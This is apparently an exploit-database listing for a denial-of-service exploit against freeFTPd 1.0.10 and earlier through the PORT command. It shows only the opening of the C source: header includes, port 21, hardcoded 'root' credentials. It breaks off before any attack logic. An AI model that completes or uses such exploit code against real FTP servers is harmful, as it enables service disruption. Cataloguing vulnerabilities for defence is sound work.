FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit
No description provided by source. // freeFTPd Denial of Service Attack // Tested on a Win XP Sp1 Box include "stdio.h" include "winsock2.h" pragma comment lib,"ws232" define PORT 21 define USER "root" define PASS "root" define L "--------------------------------------------------" define HL...